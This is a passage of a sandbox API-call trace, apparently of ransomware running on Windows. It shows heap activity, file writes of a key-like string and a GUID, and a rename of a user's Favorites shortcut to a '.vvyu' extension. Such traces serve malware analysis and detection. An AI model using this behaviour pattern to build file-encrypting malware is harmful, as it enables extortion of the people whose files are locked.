(HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ac0 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ad8 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a78 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a48 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39408 | out: hHeap=0x6a0000) returned 1 [0189.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.797] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.797] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.797] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.799] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.799] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.799] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.800] CloseHandle (hObject=0x584) returned 1 [0189.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0189.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.801] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url.vvyu")) returned 1 [0189.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.803] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.805] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0189.805] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0189.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.806] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0189.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0189.806] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0189.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0189.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) 